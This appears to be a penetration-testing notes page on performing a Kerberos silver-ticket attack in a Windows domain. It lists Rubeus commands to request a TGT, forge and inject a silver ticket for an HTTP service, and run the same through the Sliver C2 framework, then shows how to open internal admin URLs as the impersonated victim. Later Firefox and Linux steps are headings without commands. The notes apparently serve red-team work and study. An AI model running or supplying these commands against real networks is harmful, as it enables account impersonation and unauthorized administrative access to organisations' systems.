githubEdit

Silver Ticket

Impersonating a user from a domain group which has access to a web service

Windows

1) Get TGT and see if we can reach the child domain

.\Rubeus.exe hash /password:password123
.\Rubeus.exe asktgt /domain:domain.com /user:username /rc4:ffffffffffffffffffffffffffffffff /nowrap /ptt

2) Generate silver ticket impersonating victim user from prod domain for http service on machine05

.\Rubeus.exe silver /service:HTTP/machine05.domain.com /rc4:ffffffffffffffffffffffffffffffff /user:victim /domain:domain.com /nowrap /ptt /ldap

3) In sliver

rubeus -t 30 -- silver /service:HTTP/machine05.domain.com /rc4:ffffffffffffffffffffffffffffffff /user:victim /domain:domain.com /nowrap /ldap /ptt

4) Open internet explorer, go into intranet settings and add the domain machine05.domain.com into trusted sites after opening

&"C:\Program Files\internet explorer\iexplore.exe"

5) Open the following urls, we're now victim

http://machine05.domain.com/Internal/
http://machine05.domain.com/Internal/Admin

6) To try on Browser, convert the base64 contents we got into .ccache format

7) Open firefox

8) Set configs

9) Set the following settings

10) Reopen firefox and we should be able to access the Admin portal

11) Within linux, this works

Linux

1) Get victim's ticket

2) Check ticket status

3) We can now impersonate victim

Last updated